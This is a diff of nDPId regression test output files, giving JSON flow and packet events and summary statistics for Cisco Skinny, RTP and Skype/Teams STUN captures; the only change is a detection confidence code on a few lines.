+00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1317801134362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134362,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4gAAEARYEHAqMM6wKjBGH2WJLMAtPMngAAFnQAC4gD2v1fi\/H3+end3dHZ1dHp8ffz6\/f9+eXv8\/vr4+\/v8\/fz7\/Pv5fnx5d3x2dv\/++\/n7+fr7+\/9+fnt3dHVzdHZ5fnt8\/f\/+\/Pz6\/n\/7\/f35\/vz3\/n\/9f3\/\/fXp7e3t8fH16d3l8fX\/+fX\/+fH58e359\/vr6+Px8fnz++P39\/H59fXx8e3h5d3V7fn78\/f319\/r6+\/n9f\/19f3x1eHhydXd6\/v\/8\/A=="} +00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1317801134368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134368,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+gAAEARX+nAqMMywKjBGEU+JLcAtNjtgAAGRAAFiBh8EHHof\/79+v56fX1+fHl7en3\/fHx+\/f7+\/n58f\/9\/fnp7fvz6\/\/\/+\/Pt+\/nx5e3x9fP9+fH18fnp7fHx+eX3+\/f1+fv37\/Hx7\/n7+\/nz9fXt9fv59eHp\/e39+eX17fn3+\/337\/\/v+f\/p9\/v18\/\/9+fXx7e317ff5+fHt9fn5+f37\/\/H99ff77+v5+fn76\/X5+e39\/fv59fXz\/\/H58enr+fH17dg=="} 
+00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1317801134369,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134369,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4oAAEARYD\/AqMM6wKjBGH2YJLQAtDYOgAAFlQAFiBgeBjsif\/79+v56fX1+fHl7en3\/fHx+\/f7+\/n58f\/9\/fnp7fvz6\/\/\/+\/Pt+\/nx5e3x9fP9+fH18fnp7fHx+eX3+\/f1+fv37\/Hx7\/n7+\/nz9fXt9fv59eHp\/e39+eX17fn3+\/337\/\/v+f\/p9\/v18\/\/9+fXx7e317ff5+fHt9fn5+f37\/\/H99ff77+v5+fn76\/X5+e39\/fv59fXz\/\/H58enr+fH17dg=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134383,"flow_last_seen":1317801134383,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134383,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17732,"dst_port":9400,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1317801134383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134383,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+sAAEARX+bAqMMywKjBGEVEJLgAtEqsgAAGPwAC4qB8EHHz\/Pn+\/Pr9\/Xt+fnd9enn9e338\/fp+f\/n8\/f79\/n5+enh5eHl8fX5\/\/v95fv5\/\/P36\/n1\/fvr6\/P1\/\/f7\/\/315d3l3eXp7\/3x6fX5+fnl7\/H5\/\/n7+fXx+fv7+f37+\/v75+Pr09fn2+359eHd3c3Z5dXh9fP78fvz5\/vv8ff7+fX9\/fv3+\/nx5e3h1d3Z4eXh6\/\/z6+\/79\/X17fv5+\/\/\/9+g=="} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134383,"flow_last_seen":1317801134383,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134383,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17732,"dst_port":9400,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1317801134388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134388,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+wAAEARX+XAqMMywKjBGEU+JLcAtDLhgAAGRQAFiLh8EHHofHt9f319fPv+\/v54f\/7\/e3l9e\/79f3p7fn18e316ff5+\/X58fv1\/\/v9+f3p+f31\/fv3+f31+\/np6fnx8fnz9\/P\/8fv37ff3\/fH7+\/3v\/f318f\/t8fP19fH19\/fl\/ev39+fx9d3Fw+NlhW8pMTLpRPsLeSefcWnbk8lz61FL72VV96Wtf6+1j6G777m\/scn\/3eX7+cXDubGz2fnF77nN2\/A=="} 
+00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1317801134389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134389,"pkt":"ABTy5fxCAB56JnR1CABFuADIE40AAEARYDzAqMM6wKjBGH2YJLQAtJABgAAFlgAFiLgeBjsifHt9f319fPv+\/v54f\/7\/e3l9e\/79f3p7fn18e316ff5+\/X58fv1\/\/v9+f3p+f31\/fv3+f31+\/np6fnx8fnz9\/P\/8fv37ff3\/fH7+\/3v\/f318f\/t8fP19fH19\/fl\/ev39+fx9d3Fw+NlhW8pMTLpRPsLeSefcWnbk8lz61FL72VV96Wtf6+1j6G777m\/scn\/3eX7+cXDubGz2fnF77nN2\/A=="} +00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1317801134403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134403,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+4AAEARX+PAqMMywKjBGEVEJLgAtCDKgAAGQAAC40B8EHHz+vv9\/f7+\/nx6eXh7ff\/9\/fb4+vj5+f5+fHh8eHd5en5++\/39\/Xt\/enl7eH54efr+\/Pp9f3p5fHV4enp\/\/Pj59vn+9vb8fHl6d3t5ev5\/\/P768\/n5+f7+fHV1dnR6fXd8\/31\/eHr+eX39d3n4\/f73+Pz8\/3t7e3p2dn59fPv5+\/v4\/X\/8fH18e39+fv78\/fv59\/b7\/nx7fXh3d3p\/fHt9fg=="} 
+00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1317801134423,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134423,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE\/EAAEARX+DAqMMywKjBGEVEJLgAtBwlgAAGQQAC4+B8EHHzfn78fXn\/eXV9d3b9\/338+\/f7fH59e3p2eX3++\/309fz6e3l6c3h3dnt3fff49\/Pz9vf2+Pv9fX19fX1+\/f1\/e3l5d3d1dHh6fHp6fv7++\/r3+H59fHx9e3l9+\/99\/P37+X57e3l8e3p\/f379\/fv7+\/r8\/v\/8\/n7\/\/\/39fXx6dnd5ev9+eXx6eH16fPx\/\/Pj5+fv7\/H15d3l7fH7\/\/f39\/A=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2643,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801140764,"flow_last_seen":1317801140764,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1317801140764,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"10.16.2.25","src_port":50917,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2643,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1317801140764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1317801140764,"pkt":"ABTy5fxCAB56JnR1CABFYAA0F0wAAEAG0wzAqMM6ChACGcblB9CCZg4uo3beQVAYIAAasgAABAAAAAAAAAAAAAAA"} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2643,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801140764,"flow_last_seen":1317801140764,"flow_idle_time":7580000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1317801140764,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"10.16.2.25","src_port":50917,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2664,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1317801140821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317801140821,"pkt":"AB56JnR1ABTy5fxCCABFYAAod8dAADwGNp0KEAIZwKjDOgfQxuWjdt5BgmYOOlAQFtAn6gAAAAAAAAAA"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2941,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801141463,"flow_last_seen":1317801141463,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1317801141463,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.195.58","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2941,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1317801141463,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1317801141463,"pkt":"AB56JnR1AB1FDGVjCABFAAA4GBEAAEABWvbAqMMywKjDOgMDmwIAAAAARbgAyBe5AABAEVn2wKjDOsCowzJ9kEU2ALSefw=="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2941,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801141463,"flow_last_seen":1317801141463,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1317801141463,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.195.58","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.235927} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1317801141463,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1317801141463,"pkt":"AB56JnR1AB1FDGVjCABFAAA4GBEAAEABWvbAqMMywKjDOgMDmwIAAAAARbgAyBe5AABAEVn2wKjDOsCowzJ9kEU2ALSefw=="} 
+00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1317801141463,"flow_last_seen":1317801141463,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.195.58","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1317801130501,"flow_last_seen":1317801141627,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":52,"midstream":1,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.12","src_port":49399,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1317801130506,"flow_last_seen":1317801153428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":2312,"flow_avg_l4_payload_len":52,"midstream":1,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.193.12","dst_ip":"192.168.195.50","src_port":2000,"dst_port":51532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":355,"flow_first_seen":1317801134348,"flow_last_seen":1317801141428,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":61060,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17726,"dst_port":9399,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":353,"flow_first_seen":1317801134383,"flow_last_seen":1317801141423,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":60716,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17732,"dst_port":9400,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":1317801134322,"flow_last_seen":1317801141602,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":62780,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32150,"dst_port":9395,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":356,"flow_first_seen":1317801134349,"flow_last_seen":1317801141449,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":61232,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32152,"dst_port":9396,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1317801134322,"flow_last_seen":1317801141602,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":248024,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.195.50","src_port":32144,"dst_port":17718,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1317801140764,"flow_last_seen":1317801140821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1317801153428,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"10.16.2.25","src_port":50917,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","packets-captured":2975,"packets-processed":2967,"total-skipped-flows":0,"total-l4-payload-len":498712,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1317801153428} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 2975/2967 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 498712 bytes +~~ total detected protocols..: 9 +~~ total active/idle flows...: 9/9 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6097600 bytes +~~ total memory freed........: 6097600 bytes +~~ total allocations/frees...: 123875/123875 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 462 chars +~~ json string max len.......: 742 chars +~~ json string avg len.......: 601 chars 
diff --git a/test/results/skype-conference-call.pcap.out b/test/results/skype-conference-call.pcap.out index 06111c11e..1f1923671 100644 --- a/test/results/skype-conference-call.pcap.out +++ b/test/results/skype-conference-call.pcap.out 
@@ -2,10 +2,10 @@ 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1501061916646} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1501061916646,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1501061916646,"pkt":"XEl5dU5qxCwDBkn+CABFAACEzEwAAEARWwHAqAIUaC4oMcCC7OIAcIaYAAEAVCESpELFWk\/f3gwyXjBMYMcABgAJZ3BwZTp6V3lrAAAAACQABG7\/\/v+AKgAIAAAAAAC\/QxeAVAABMQAAAIBwAAQAAAADAAgAFMOSZmY4XAmhNOQKDGwu8wYai2KrgCgABB+1m2s="} 
-00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1501061916653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1501061916653,"pkt":"xCwDBkn+XEl5dU5qCABFAACERTYAAG4RtBdoLigxwKgCFOziwIIAcHm6AAEAVCESpEI8yF2moGJ4zvU2wuEABgAJeld5azpncHBlAAAAACQABG7\/\/v+AKQAIAAAAAAACl5OAVAABMQAAAIBwAAQAAAADAAgAFHnv8xovieyQrsQ6j2MMyqg8GNj1gCgABORvfhY="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1501061916690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"thread_ts_msec":1501061916690,"pkt":"XEl5dU5qxCwDBkn+CABFAABkjWYAAEARmgfAqAIUaC4oMcCC7OIAUFnEAQEANCESpEI8yF2moGJ4zvU2wuEAIAAIAAHN8Ek8jHOAcAAEAAAAAwAIABSgsacIkgIOfzKEQbuerkeFTLj204AoAASK\/70B"} -00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1501061916646,"flow_last_seen":1501061918151,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":915,"flow_tot_l4_payload_len":31287,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1501061918151,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1501061916646,"flow_last_seen":1501061918151,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":915,"flow_tot_l4_payload_len":31287,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1501061918151,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","packets-captured":200,"packets-processed":200,"total-skipped-flows":0,"total-l4-payload-len":31287,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1501061918151} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 200/200 
